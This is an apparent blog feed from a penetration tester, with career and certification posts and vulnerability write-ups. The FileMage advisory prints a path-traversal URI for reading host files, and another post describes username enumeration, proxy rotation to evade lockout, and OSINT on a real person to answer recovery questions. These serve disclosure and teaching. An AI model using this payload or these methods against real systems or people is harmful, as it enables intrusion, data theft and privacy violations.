<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="/feed.xml" rel="self" type="application/atom+xml" /><link href="/" rel="alternate" type="text/html" /><updated>2025-01-22T02:59:58+00:00</updated><id>/feed.xml</id><title type="html">Raindayzz Blog</title><subtitle>This is where I will share my thoughts, reviews, writeups, Cyber stuff, Tech stuff, etc.</subtitle><entry><title type="html">Consulting Versus Internal - A Penetration Tester’s View</title><link href="/blog/2025/01/21/Pentester-POV.html" rel="alternate" type="text/html" title="Consulting Versus Internal - A Penetration Tester’s View" /><published>2025-01-21T00:44:14+00:00</published><updated>2025-01-21T00:44:14+00:00</updated><id>/blog/2025/01/21/Pentester-POV</id><content type="html" xml:base="/blog/2025/01/21/Pentester-POV.html"><![CDATA[<h1 id="consulting-versus-internal----a-penetration-testers-view">Consulting Versus Internal  - A Penetration Tester’s View</h1>
<p>Welcome to 2025 which marks a little over five years of my professional career in cyber security. I was inspired one day during a shower thought to reflect over the last five years of experience as I’ve moved my jobs a bit in the early part of my career. Ever wonder what you would prefer; consulting or internal for offensive cyber work? I plan on discussing these two and my anecdotal experiences in both.</p>

<p>Disclaimer: I’ll talk about the two in my anecdotal experiences, this is meant to be particular to my roles and experiences and not fully representative of what is best for you or the group.</p>

<h2 id="consulting">Consulting</h2>
<p>I put consulting first as it’s what I am more confident in as I spent ~4 years doing it. Doing offensive cyber work in the consulting world can range from kicked back, feet up, vulnerability scans all the way to continuous complex red team engagements. Consulting can be very dependent on the client and type of work that was sold.</p>

<p>Doing Penetration Testing consulting you will get to see so many different infrastructures and networks. Sure you will see the common managed M365 on external and LLMNR traffic on internals but each network i’m confident you will come across a new service or technology you haven’t seen before. This keeps you on your toes and often a cool peak that comes with it. This will always keep you wet behind the ears and give plenty of opportunity to help share this with our other practitioners in the industry. A good example of this is a cisco phone service I ran across that got me initial credentials during an internal - https://trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems</p>

<p>Another great perk of this is the offering tha your consulting will offer. For example when I was working at Deloitte, we only offered X amount of work and often it was more monotonous web work. When I moved to Optiv, the offerings really got fun to do. A client would want a wireless, external, and targeted internal where we could share the findings between all to enhance the attack scenario. A good example is I did an on-site wireless and internal in the DMV area which was almost a sudo on-site insider threat. I was able to breach the internal network using a wifi vulnerability and escalate my basic user permissions into local host admin rights on most of their machines before being interrogated by the IT folks in the room next to me. Fun stuff and this leads to a bigger point. Consulting is FUN and keeps you young, domain admins rush on internal networks of F500 companies has and always will keep you addicted to this niche field.</p>

<p>Another impact point here is what the client is and what type of work was sold to them. In my experience, one of the biggest problems I saw was lack of communication and expectation between sales teams and the folks doing the work (like myself). A lot of time there was an expectation gap between what they are getting VS what we could do with the Statement of Work (SoW).</p>

<p>The last big con for me was reporting. Writing a report for clients was always a PITA and I didn’t have ChatGPT like the young bucks now working there. Writing summaries and root cause analysis graphs were some of my deathly tasks I did. While not many people like doing it, it’s one of the most important parts and the skills that have more gaps than the technical chops. A great old director of mine, Ryan D, always said “Clients are giving us 5-30k for a few PDFs, make them good” which is very true. All of the fancy technical things we do have to be clear and transparent to the client.</p>

<h3 id="pros">Pros</h3>
<ul>
  <li>Lots of clients and different networks</li>
  <li>Opportunity for Travel</li>
  <li>Types of Offerings</li>
  <li>Opportunity to share work outside of company with the industry</li>
</ul>

<h3 id="cons">Cons</h3>
<ul>
  <li>Report Writing</li>
  <li>Consulting life - Client is always right and changes their mind a lot</li>
  <li>Utilization requirements and relying on sales/gigs</li>
</ul>

<h2 id="internal">Internal</h2>
<p>As I am writing this I am 1 year and five months into my tenure at Amazon Web Services as an Offensive Security Engineer. I moved out of consulting for a few different things but the three things I love the most is the room for impact. When I do engagements now, I can identify findings and recommendations that affect more than the service I am touching. It’s really scalable that you find an issue with a AWS service and can root cause and address it in many more places, it’s very rewarding.</p>

<p>I also love the part of less report writing. Don’t get me wrong, Amazon is heavy on document driven business but I don’t find myself writing executive summaries unless asked for leadership emails. Writing is a key skill at Amazon, they pride themselves in it, there is classes, quarterly meetings about it. Just have to do less BS writing.</p>

<p>Lastly, the room to grow my engineering skills. Penetration Testing in the consulting life is a lot of keyboard jockey work. Using tools and techniques from existing researchers and doing it in client networks. Internally, I can identify a use for a tool or code that might help others and take time to develope that and share with engineers within our sister teams. This is cool, I’m working on a super cool Burp Suite Extension at the time of this writing but won’t be able to share. That’s a con that comes with internal, sharing tools or TTPs during work isn’t encouraged like it is at consulting firms.</p>

<p>A con would be the bureaucracy of working at a F100 company. Role guidelines, slower management guck, politics, promotion timelines, etc. All of these Amazon prides themselves in being agile but it still exists like every F100 company I assume.</p>

<p>A con is not having the dopamine rush I had in consulting. I can count on two hands the amount of remote code execution (RCE) I’ve gotten at AWS as the security bar is normally much higher than a random companies external perimeter with 100s of hosts running multiple software. When I do find these they are much more rewarding as they are far scarce but I really do miss the Domain Admin Rush on day 1 of a test.</p>

<h3 id="pros-1">Pros</h3>
<ul>
  <li>Time for development/trainings</li>
  <li>Impact/Scale</li>
</ul>

<h3 id="cons-1">Cons</h3>
<ul>
  <li>More bureaucracy</li>
  <li>Less fun / dopamine work</li>
</ul>

<h2 id="overview">Overview</h2>
<p>You’ll notice how I didn’t mention job security in either one; that is because it’s very dependent. For example, a consultant could be fired due to low utilization but they don’t have control on what the sales team is able to sell. An internal employee like myself at AWS, AMZN stock price could go down 20 percent and the executive team could decide to do layoffs. In the great words of Pat McAfee, situations are very situational; I won’t give one a higher rating than the other.</p>

<p>I hope some of these insights guide you in the right direction or just share some of my experiences with you. Reach out to me if you ever need any advice on what is right for you; I love giving my solicited advice lol.</p>]]></content><author><name></name></author><category term="Blog" /><summary type="html"><![CDATA[Consulting Versus Internal - A Penetration Tester’s View Welcome to 2025 which marks a little over five years of my professional career in cyber security. I was inspired one day during a shower thought to reflect over the last five years of experience as I’ve moved my jobs a bit in the early part of my career. Ever wonder what you would prefer; consulting or internal for offensive cyber work? I plan on discussing these two and my anecdotal experiences in both.]]></summary></entry><entry><title type="html">GIAC SANS 660 Review &amp;amp; GXPN Certificate</title><link href="/review/2024/08/03/SANS-660-Review.html" rel="alternate" type="text/html" title="GIAC SANS 660 Review &amp;amp; GXPN Certificate" /><published>2024-08-03T16:45:14+00:00</published><updated>2024-08-03T16:45:14+00:00</updated><id>/review/2024/08/03/SANS-660-Review</id><content type="html" xml:base="/review/2024/08/03/SANS-660-Review.html"><![CDATA[<h1 id="overview">Overview</h1>

<p><a href="https://www.sans.org/cyber-security-courses/advanced-penetration-testing-exploits-ethical-hacking/">SANS 660</a> is a very wide course that provides detailed information and labs about kind of the next “entry” level of pentesting. The course assumes you know things that any penetration tester or someone who has passed something like OSCP to get started. Familar with how to use windows/linux CLIs, shells, post exploitation and sich.</p>

<p>This course comes with a GIAC certification - “The GIAC Exploit Researcher and Advanced Penetration Tester (GXPN) certification validates a practitioner’s ability to find and mitigate significant security flaws in systems and networks. GXPN certification holders have the skills to conduct advanced penetration tests and model the behavior of attackers to improve system security, and the knowledge to demonstrate the business risk associated with these behaviors.”</p>

<p>I was lucky enough to have the opportunity to have my employer pay for the training and the certification. Thanks to AWS and their <a href="https://www.amazon.jobs/content/en/our-workplace/leadership-principles">Strive to be the Earth’s Best Employer</a>. This is my second course from SANS but ironically it’s been about five years since I took the last one which was SANS 503. You can find that review <a href="https://raindayzz.com/review/2021/07/27/GIAC-SANS503.html">here</a>
***</p>

<h1 id="my-experience">My Experience</h1>
<p>My course was the on-demand verison that came with the on-demand courses recorded, books shipped to you with the lectures, workbooks, and a smaller reference guide. I was disappointed that the hard material didn’t contain a few small</p>

<h3 id="studying">Studying</h3>

<p>I have about 5ish years of penetration testing experience on a whole stack of technology. I’ve done networks, binary, web, api, IoT, and SE testing. I’ve always lacked a foundation in crypto which was a topic that was covered in the course. I recieved the books and go started instantly. I have some “dev time” at work which allows the engineers to work on projects, ideas, trainings, and automation. This seemed like a great week that take advantage of to sprint through the course. I spent most of my time listening to the videos, following along with my highlighter and index paper, highlighting things that seemed to be important.</p>

<p>I got throught the course in four days from working from home. I skipped some of the longer videos from labs as I was working on them at a later date and wanted to get through the material.</p>

<h3 id="labs">Labs</h3>
<p>I didn’t do too many labs, I did some of the setup and I will get into the rant of this later.</p>

<h3 id="practice-tests">Practice Tests</h3>
<p>I took two practice tests and they were helpful. The first one, I just sprinted through without notes, no indexing or looking through notes. I scored a 63% which is failing in this case. This was ok to me since I didn’t use any notes and just top of mind material. The Second test I scored in the 70s with using “some” material.</p>

<h3 id="test">Test</h3>
<p>I took my test at 5:20PM EST using the proctorU software. I’m going to list my rant below but the software was a PITA. Being more specific to the test, I had 60 questions and 3 hours to pass. There were 6 Lab, hands on questions that ranged from similar practice question tests. I thought that some of the questions were ambigious by design. I can’t reveal any actual thoughts on this since it would disclose exam questions but some of them were kind of opinion on what would be best in a situation. I completed the test in about 2 hours and 20 minutes. I passed the exam obtaining the GXPN certification with an 88%</p>

<p><img src="/assets/images/SANS660/GXPN.png" alt="exampass.png" /></p>

<h3 id="rant-time">Rant Time</h3>

<p>I have two significant points in which why I wouldn’t reccomend this course/cert. I’ll get started with the one that I think SANS is responsible for and secondly something they  might have less control over.</p>

<ol>
  <li>Lack of M1 (ARM chip) support in the labs. When I first heard of this, it was back in 2021 when I took SANS 503. This was the first year Apple was coming out with the chips and I was an owner of a Macbook Air with the M1 at the time. I cut them a break as the migration from intel based labs to ARM is quite a difficult task.</li>
</ol>

<p>FOUR years later and Apple still improving to make the M series chip with other moving towards ARM such Snapdragon on Windows, SANS has visibly made no progress to the development or support of the labs on these systems. I’m not sure what they are waiting on or have blockers that aren’t apperant to me but it’s quite ridiculious that the labs aren’t compatiable with ARM based chips. SANS offered high quality, very expensive trainings that are 7-10k for a course. Get a move on it.</p>

<p>Here is the snippet from the Sec 660 course, I spot checked a few others and they seem to be the same.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CRITICAL: Apple systems using the M1/M2 processor line cannot perform the necessary virtualization functionality and therefore cannot in any way be used for this course.
</code></pre></div></div>
<ol>
  <li>ProctorU based software was an unpleasant experience. I knew from my previous SANS 503 course I’d have to work with this PITA again. While installing my spyware that they offer, I was assigned a proctor, let them share screen and things of that nature. I knew that was coming, however, I didn’t know I’d need not only my drivers lisence but the proctor also asked for my passport. I just feel as if a cyber security course online needs my DL and passport is a bit invasive.. I know cheating must be an issue if that is the case but to what extent are we going to draw the line. Secondly, the proctor did all of the spyware install but then asked to take control of my mouse and PC. The proctor disabled keyboard screenshot shortcuts in my accessibility settings (I thought this was overkill but next time maybe let me do it?). The proctor failed to re-enable these or instruct to do so after the exam leaving these features disabled. The software also didn’t reccomend disabling the permissions given or removing the ProctorU spyware.</li>
</ol>

<p>I find it ironic that a course in the cyber field would be so intrusive and uncalibrated.</p>

<h1 id="would-i-recommend">Would I Recommend?</h1>

<h3 id="maybe">Maybe</h3>

<p>I liked the course to an extent, the material was helpful and good but just very broad. These fields are so complex that teaching crypto, network, and post explotation could be it’s own course. The Linux and Windows Exploit dev could be seperated into its own course as well.</p>

<p><em>Disclaimer : I would NOT reccomened any SANS course unless an employeer is paying for it. 8K can be spent on so many udemy, books, or alternative course.</em></p>]]></content><author><name></name></author><category term="review" /><summary type="html"><![CDATA[Overview]]></summary></entry><entry><title type="html">End of Year Recap of 2023</title><link href="/blog/2023/12/26/End-of-Year-Recap.html" rel="alternate" type="text/html" title="End of Year Recap of 2023" /><published>2023-12-26T16:44:14+00:00</published><updated>2023-12-26T16:44:14+00:00</updated><id>/blog/2023/12/26/End-of-Year-Recap</id><content type="html" xml:base="/blog/2023/12/26/End-of-Year-Recap.html"><![CDATA[<p>Hi everyone! Hope everyone had a happy holidays - I wanted to write a small blog about a <a href="https://raindayzz.com/blog/2023/03/15/Goals-for-2023.html">Goal sheet I put out back in March</a>. I’m a big goal setting motivation person; I think speaking things into existance and manifesting them certainly help tackle them. The aforementioned blog post had three goals and I’ll break them down below on the things I completed and my weak excuses :P</p>

<ol>
  <li>
    <p>CRTO - Certified Red Team Operator - Crushed this one! I was able to get the course through my employer (Optiv) and we had a large group take the course. It was overall a sweet course, maybe I’ll write a blog post about the course but there is a ton of those already out there. As far as the exam, it was submitting points to a dashboard so no report PDF (Thank goodness) but with that being said, I don’t remember much on what was on the exam. The exam was challenging but all required materails were in the course, just make sure you cover all things like Cobalt Strike profiles etc…. Goal achieved!</p>
  </li>
  <li>
    <p>API/Web Apps - This one was a good one, I found a ton of API vulns this year and ended up giving a talk at work about it during the <a href="https://www.youtube.com/watch?v=9AqEmVBI6BQ&amp;t=389s">Source Zero Con</a>. It had a good turnout and I ended up heading to Blackhat to give the talk at our <a href="https://www.linkedin.com/posts/bryce-harty-396614150_lasvegas-bhusa-activity-7095111622947397632-oiWR?utm_source=share&amp;utm_medium=member_desktop">company’s booth</a>. It was a fun trip and my first time actually out to Vegas during the BH/Defcon timeframe. I also recently took a seperate job at AWS that deals mostly with API’s, even ones without front ends so that field to me has done nothing but blow up. I can confidently say I achieved this goal!</p>
  </li>
  <li>
    <p>OSWE - I never was able to complete this in 2023. Between switching jobs, I had quite some stuff that kept me busy. I won’t be dropping this one, just listing it on my 2024 list. Not afraid to say I failed the timeframe but won’t fail on the exam hopefully.</p>
  </li>
</ol>

<p>So all in, I was 2/3.. Not bad but 66% would be a D in a college class so I guess it’s all relative. Looking forward to 2024 and all of the things that come. I wish you all the best of luck and wellness in the new year.</p>]]></content><author><name></name></author><category term="Blog" /><summary type="html"><![CDATA[Hi everyone! Hope everyone had a happy holidays - I wanted to write a small blog about a Goal sheet I put out back in March. I’m a big goal setting motivation person; I think speaking things into existance and manifesting them certainly help tackle them. The aforementioned blog post had three goals and I’ll break them down below on the things I completed and my weak excuses :P]]></summary></entry><entry><title type="html">File Mage - CVE-2023-?</title><link href="/technicalblog/2023/12/01/CVE-2023-46476.html" rel="alternate" type="text/html" title="File Mage - CVE-2023-?" /><published>2023-12-01T05:44:14+00:00</published><updated>2023-12-01T05:44:14+00:00</updated><id>/technicalblog/2023/12/01/CVE-2023-46476</id><content type="html" xml:base="/technicalblog/2023/12/01/CVE-2023-46476.html"><![CDATA[<h3 id="overview">Overview</h3>
<p>Hello all! Just grabbed my first beer and going to crank this blog out tonight on a fall night session. I found another one :)</p>

<p><img src="/assets/images/FM2/djkhalidanothaone.jpg" alt="djkhalid.jpg" /></p>

<p>While reviewing an applicaiton in my freetime, I identified a security vulnerability in FileMage Gateway. FileMage does not properly handle the session cookie in the application therefore leaving it vulnerable to replaying/hijacking attacks. This vulnerability is present and identified on all version on the Marketplace product (Azure, AWS, Google Cloud, and IBM).</p>

<h3 id="what-is-filemage">What is Filemage</h3>
<p>FileMage Gateway is an FTP/SFTP server backed by a cloud object storage API. Deployable from your cloud provider marketplace and billed hourly.</p>

<h3 id="technical-details">Technical Details</h3>

<p>With an administrative account we were able to view the current list of administrators and add a new admin using GET/POST requests as demonstrated below:</p>

<p><code class="language-plaintext highlighter-rouge">GET /Administrator</code>
<img src="/assets/images/FM2/admin1.png" alt="admin1.jpg" /></p>

<p>POST /administrators - adding a new user called “loggedin@test.com”</p>

<p><img src="/assets/images/FM2/admin2.png" alt="admin2.jpg" /></p>

<p>The vulnerability is identified when a user logs out, it does not invalidate the session cookie.</p>

<p><img src="/assets/images/FM2/admin3.png" alt="admin3.jpg" /></p>

<p>Now when using the same session cookie, we are still able to view and add additional administrator users as seen below:
Adding an additional user called with expired session cookie “loggedout@test.com”
<img src="/assets/images/FM2/admin4.png" alt="admin4.jpg" /></p>

<p>GET /administrators with expired session cookie
<img src="/assets/images/FM2/admin5.png" alt="admin5.jpg" /></p>

<p>##### Okay, let’s test some other “Session” related stuff
 <img src="/assets/images/FM2/admin6.png" alt="admin6.jpg" /></p>

<p>With an administrative account we are able to view the current list of administrators and add a new admin using GET/POST requests demonstrated below:
POST /administrators - adding a new user called “prechange@test.com”</p>

<p><img src="/assets/images/FM2/admin7.png" alt="admin7.jpg" /></p>

<p>GET /administrators</p>

<p><img src="/assets/images/FM2/admin8.png" alt="admin8.jpg" /></p>

<p>The user is able to change their existing password and still use the old session cookie to perform admin functionality.
POST to /profile updating the password of the currently logged in account</p>

<p><img src="/assets/images/FM2/admin9.png" alt="admin9.jpg" /></p>

<p>We are still able to add and view old accounts simulating admin functionality. POST /administrators - adding a new user called “POSTCHANGE@test.com”</p>

<p><img src="/assets/images/FM2/admin10.png" alt="admin10.jpg" /></p>

<p>GET /administrators
 <img src="/assets/images/FM2/admin11.png" alt="admin11.jpg" /></p>

<h3 id="impact">Impact</h3>
<p>Filemage contains two vulnerabilities that could allow an attacker to maintain unauthorized access over a hijacked session a er the legitimate user has signed out or changed the password of their account.</p>

<h3 id="reccomendation---stateless-cookies">Reccomendation - Stateless Cookies?</h3>]]></content><author><name></name></author><category term="TechnicalBlog" /><summary type="html"><![CDATA[Overview Hello all! Just grabbed my first beer and going to crank this blog out tonight on a fall night session. I found another one :)]]></summary></entry><entry><title type="html">FileMage Gateway LFI</title><link href="/technicalblog/2023/08/20/FileMage-Vulnerability.html" rel="alternate" type="text/html" title="FileMage Gateway LFI" /><published>2023-08-20T16:44:14+00:00</published><updated>2023-08-20T16:44:14+00:00</updated><id>/technicalblog/2023/08/20/FileMage-Vulnerability</id><content type="html" xml:base="/technicalblog/2023/08/20/FileMage-Vulnerability.html"><![CDATA[<h3 id="overview">Overview</h3>
<p>Hello all! Long time no see, I recently identified a vulnerability on FileMage Gateway that I applied for my first CVE.</p>

<p>On a recent security assesment, I identified a security vulnerability in FileMage Gateway. It is possible to send an unauthenticated HTTP(s) GET request to retrieve arbitrary files on the host system. This vulnerability is present and identified on the Azure Marketplace product.</p>

<h3 id="what-is-filemage">What is Filemage</h3>
<p>FileMage Gateway is an FTP/SFTP server backed by a cloud object storage API. Deployable from your cloud provider marketplace and billed hourly.</p>

<h3 id="technical-details">Technical Details</h3>

<p>This section outlines the steps to replicate the exploitation of the identified vulnerability. I deployed an Azure Virtual Machine from the marketplace for the technical analysis. Additional reference material may be requested if needed.</p>

<p>By navigating to the homepage on FileMage Gateway, a path traversal vulnerability is present under the /mgmnt/ directory on the Azure Marketplace Deployment. An unauthenticated HTTPS GET request can be sent using dot-dot slash sequences using URL encoding as observed below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>URI: /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5 cwindows%5cwin.ini
</code></pre></div></div>

<p><img src="/assets/images/FileMage/one.png" alt="win.jpg" /></p>

<p>Deploying a test instance from the Azure Marketplace, process monitoring was leveraged to understand where the sensitive and configuration files are stored in FileMage.</p>

<p><img src="/assets/images/FileMage/proc.png" alt="proc.jpg" /></p>

<p>It’s possible for an unauthenticated user to extract sensitive data such as FileMage and PostgresSQL configuration files, SSH keys, and other sensitive files as illustrated in the screenshots below.</p>

<p><img src="/assets/images/FileMage/config.png" alt="config.jpg" /></p>

<p><img src="/assets/images/FileMage/ssh.png" alt="ssh.jpg" /></p>

<p><img src="/assets/images/FileMage/postgres.png" alt="postgres.jpg" /></p>

<p>This vulnerability was tested on non-azure deployments of FileMage but were found not to be vulnerable to the path traversal. I disclosed this vulnerability with the help of a great friend <a href="https://twitter.com/Tyl0us">“Tylous”</a>, thanks! This has since been patched.</p>

<h3 id="recommendation">Recommendation</h3>
<p>User-controllable data should be strictly validated before being passed to any filesystem operations. In particular, input containing dot-dot sequences should be blocked. This was disclosed to the vendor</p>

<h3 id="patched">Patched</h3>

<p>https://www.filemage.io/docs/updates.html - This was updated in 1.10.9 version of FileMage</p>

<h3 id="cve">CVE!</h3>

<p>This vulnerability was assigned <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-39026">CVE-2023-39026</a>. This vulnerability got a 7.5 CVSS3.0 score rating it as a high severity vulnerability. Pretty excited for this one being the first. I submitted the Nuclei and exploitDB script for assesment.</p>]]></content><author><name></name></author><category term="TechnicalBlog" /><summary type="html"><![CDATA[Overview Hello all! Long time no see, I recently identified a vulnerability on FileMage Gateway that I applied for my first CVE.]]></summary></entry><entry><title type="html">Goals for 2023</title><link href="/blog/2023/03/15/Goals-for-2023.html" rel="alternate" type="text/html" title="Goals for 2023" /><published>2023-03-15T16:44:14+00:00</published><updated>2023-03-15T16:44:14+00:00</updated><id>/blog/2023/03/15/Goals-for-2023</id><content type="html" xml:base="/blog/2023/03/15/Goals-for-2023.html"><![CDATA[<p>March in 2023 already! Wow, time is flying by due to life in general. Things have been hectic from a work and personal life perspective. Just wanted to write a small blog on things I have planned for the year in hope of reflecting on them later in the year and seeing what I accomplished and what went “wrong” per say</p>

<ol>
  <li>
    <p>CRTO - Certified Red Team Operator - Got the course through work, about half way done between flights and airport sitting. Hoping to get throughout a few more weeks of a fast Q1 and get a week or so downtime to lock in some material. I’d recommend the course so far, it’s given me some pretty good info about CS and Red teaming. Although it’s a Red Team course, I don’t think it prepares you for red team engagments. I’ve seen the skill caliber of the people who do RT at my companies and it’s a larger gap.</p>
  </li>
  <li>
    <p>API/Web Apps - Since December of 2022, I’ve been on web app gigs quite frequently and been rather successful. I volunteered at work to give a talk about some of the API attack vectors and being on more of a net pen team at work, we sometimes overthink some of the easy wins on the web perspective. Giving a 45ish min talk at my work conference this year (will post the vid when done ~julyish). Excited to do so, LFG.</p>
  </li>
  <li>
    <p>OSWE - This is an ambitious one…. I want to take and pass the OSWE course from Offsec. I’m going to pay out of pocket and try to at least get the ball rolling on this. In my older gigs (SOC, threat detection, Vuln, etc) it was easy taking pentest certs because I’m moving towards the goal and not doing it 8-10 hrs a day. Now that I’m in a faster pace consultant pentest gig, it’s quite hard to get the motivation to study after doing it 8-10 hrs a day in general.</p>
  </li>
</ol>

<p>Let’s come back to this later in the year and see what we accomplished and what wasn’t… Either way, cheers to the new year and best of luck to you all. Thanks for reading!</p>]]></content><author><name></name></author><category term="Blog" /><summary type="html"><![CDATA[March in 2023 already! Wow, time is flying by due to life in general. Things have been hectic from a work and personal life perspective. Just wanted to write a small blog on things I have planned for the year in hope of reflecting on them later in the year and seeing what I accomplished and what went “wrong” per say]]></summary></entry><entry><title type="html">Why Your Mothers Maiden Name Doesn’t Work Anymore</title><link href="/technicalblog/2022/12/06/MothersMaidenName.html" rel="alternate" type="text/html" title="Why Your Mothers Maiden Name Doesn’t Work Anymore" /><published>2022-12-06T16:44:14+00:00</published><updated>2022-12-06T16:44:14+00:00</updated><id>/technicalblog/2022/12/06/MothersMaidenName</id><content type="html" xml:base="/technicalblog/2022/12/06/MothersMaidenName.html"><![CDATA[<p>Long time, no blogs. I’ve been crazy busy with a new consulting gig and Q4. Glad to be pushing something out that I’ve been passionate about the last few weeks.</p>

<p>By the name of this blog post, you can probably guess what I’m going to rant about this time. That’s right, those damn security recovery questions you can’t ever remember.</p>

<p>In a few recent penetration tests i’ve been on, I’ve seen an increase in self service portals (ManageEngine in particular) and for me, i’m always drooling over these. In particular, the account perspective, there is always a way to identify valid user enumeration. I want to share some light on how easy some of these are and make some recommendations to help secure these more as I seem them poorly implemented.</p>

<h4 id="proof-of-concept">Proof Of Concept</h4>

<p>I labeled this a “TechnicalBlog” so I’ve got to show SOMETHING. I’m going to redact a ton of stuff from the following but hopefully you will be able to understand.</p>

<p>Step 1 : Identify Valid Usernames</p>

<p>I normally use <a href="https://github.com/insidetrust/statistically-likely-usernames">statistically-likely-usernames</a> as it’s a list of the most common names in the US in your chosen masked format. I normally use some form of error verbose response or traffic direction to identify valid accounts. For Example, the reset password functionality on this site was the culprit for account enumeration. Valid accounts were 302 redirected to 2FA whereas invalid accounts were 302 to authFailed.</p>

<p><img src="/assets/images/Mothers/invalidaccount.jpg" alt="Invalid.jpg" />
<em>Invalid Account</em></p>

<p><img src="/assets/images/Mothers/ValidAccount.jpg" alt="Valid.jpg" />
<em>Valid Account</em></p>

<p>Once I ran 50k usernames through here, I was able to identify a few hundred. I do want to mention that this functionality had some mitigations and would lock my IP out after 25ish requests but that is an easy win and I just proxied my traffic through some proxies rotating my src IP every request.</p>

<p>So from here, you’ll have to manually vet some of the questions or recovery methods, I’ve seen phone 2FA, Google auth, and email confirmations that suffice my attack path but I found that in lots of pentests, it will be a mix of all of them. Once I identify questions that are weak, I begin my OSINT search. To save my methodology, typing words, and you having to read a bunch of nonsense, I was able to identify a users that had the following three questions:</p>

<ul>
  <li>What is your Mothers Maiden name?</li>
  <li>What is you Date of Birth?</li>
  <li>What is your Favorite Color?</li>
</ul>

<p>From here, I just did my OSINT stuff on particular users finding the more internet open users, I found a user that their facebook was public alongside their family connections. I’m really going to redact this as I want to protect the user.</p>

<p><img src="/assets/images/Mothers/Facebook.jpg" alt="Facebook" />
<em>Users Facebook Relationship Page</em></p>

<p>BOOM! That’s 1/3… Next is Date of Birth (DOB), using public voter records, I found the DOB! I was also able to find this on their wedding info and cellular information.</p>

<p><img src="/assets/images/Mothers/Voter.jpg" alt="DOB" /></p>

<p>BOOM! That’s 2/3… Well I wish I could say I found their favorite color but ROYGBIV baby! The account questions didn’t lockout or rotate so I brute forced the color on my second guess.</p>

<p><img src="/assets/images/Mothers/Reset.jpg" alt="Reset" /></p>

<p>I was able to reset this users password and breach the perimeter this way.</p>

<h4 id="recommendations">Recommendations</h4>

<p>This is something the industry is moving away from but it’s still frequent. Using some of the following will prevent a lot of these attack paths:</p>

<ul>
  <li>Don’t use trivial or guessable questions. Favorite color (unless it’s something crazy) has ROYGBIV which is a whopping seven potential answers. DOB and mother’s maiden name is weak in todays internet surface. Questions are being outdated but questions like favorite childhood friend, favorite teacher name, etc are a lot stronger and less guessable.</li>
  <li>Rotate the questions. Have users give five and only leverage three to reset the password with rotating them every failure. Lock the account after 3 attempts so some can’t brute force answers.</li>
  <li>Move away from questions to 2FA or Token based. This is the most secure way for end users.</li>
</ul>]]></content><author><name></name></author><category term="TechnicalBlog" /><summary type="html"><![CDATA[Long time, no blogs. I’ve been crazy busy with a new consulting gig and Q4. Glad to be pushing something out that I’ve been passionate about the last few weeks.]]></summary></entry><entry><title type="html">OSWP Reivew 2022</title><link href="/review/2022/07/13/OSWP-Review-2022.html" rel="alternate" type="text/html" title="OSWP Reivew 2022" /><published>2022-07-13T16:44:14+00:00</published><updated>2022-07-13T16:44:14+00:00</updated><id>/review/2022/07/13/OSWP-Review-2022</id><content type="html" xml:base="/review/2022/07/13/OSWP-Review-2022.html"><![CDATA[<p>As I begin to write this review, I just submitted my exam report listening to a few acoustic sessions while enjoing a libation. That being said, I came across this course after if was revised from the backtrack 5 days where every home network and attack vector was WEP and with the right amount of IVs, every network was crackable in minutes.</p>

<p>That being said, I recently “sprinted” this course and wanted to give a few of my thoughts, so cheers!</p>

<h3 id="reason">Reason</h3>

<p>As some may know, I’ve been working on OSEP lately with the learn one subscription so this course and exam came free to me (Thanks to my lovely employer). I was a bit down with some imposter syndome so I figured I’d get some confidence by taking this course and “sprinting” it.</p>

<p>I normally don’t post about personal stuff but taking this course was nostalgic. I’ve always waned to be a ‘hacker’ so when I was in middle school, my brother and I would always tinker on school machines (install halo, ping networks, play with netcat, write basic) and we came across offsec training! Holy shoot, OSCP, OSWE, OSCE were all that I could remeber. My brother and I came to an agreement to make it in life! We were going cut grass, rake leaves, and plow snow and it was going to get me the wiFU (OSWP) course and he was going to pursue the OSCE (that’s right, skip right past the OSCP). Together, we could not be stopped, wifi hacker + exploit hacker == hackerman.</p>

<p>** rant over ** We obviosuly never did either or, although we both studied some form of CS and work in IT now. Nostaligc none the less…</p>

<h3 id="course">Course</h3>

<p>I started grooming throught the material on a plane and it was equally as boring as the plane’s TV selection at first. The first, idk 4-5 modules, are standards, basics, and pretty complex low level network stuff. They are fundamental but I felt as if I knew some of the stuff and didn’t care about some as it seemed irreleavant to my usage (key there :P ). When I did get into the hands on stuff, it was a blast. I purchased this wireless card on amazon (next day shipping) to fool with networks of my own (and perhaps my neighboors, jk :P ).</p>

<p>Each lab covered a specific type of software/network and attack vectors. IMO, Wireless networks are a smaller attack vector than we’d think and often get overlooked in today’s stack of technology. I used an Alfa wireless network card for my home labs, sick looking! Let me tell you, this thing does NOT play well with linux and even more so if it’s a VM. I had to look into some kernel/driver stuff and if you know me, I don’t play well with hardware and kernel stuff.</p>

<p><img src="/assets/images/OSWP/WC.jpg" alt="WC.jpg" /></p>

<p>I used my access point (AP) for a development network and reset it and threw it on a different subnet to play around with capturing handshakes and cracking passwords.</p>

<p>I flew through the material in about three nights (4-5 hrs of study each). I set things up for my exam</p>

<h3 id="exam">Exam</h3>

<p>The exam is pretty normal for an offsec exam, except the timeline. This exam was 3h 45m compared to the 24/48/72 hr exams we are all used to from them. It was the same in the sense it was all hands on keyboard practical exam. As you know, I can’t disclose anything related to the exam but if you learned the material in the course, I am confident you can pass!
I had some tech difficulites with the wireless card stuff on my end for the first 45 minutes but eventually got things figured out. My exam started 20:00 EST aka 8PM EST for you noobs, I had all of the requirments by about 22:00 EST…. It was a fun exam and I wish I could say more but the exam guidelines and what it contains will be transparent when they send you the exam details before yours!</p>

<h3 id="my-thoughts">My thoughts</h3>

<p>Right to the point, I woulnd’t buy it. If you have learn one, it’s an add on. NOT worth buying the 2k sub for this course tho. Hopefully I can work on some on site pentests/engagments to test out some of this wireless tests.</p>

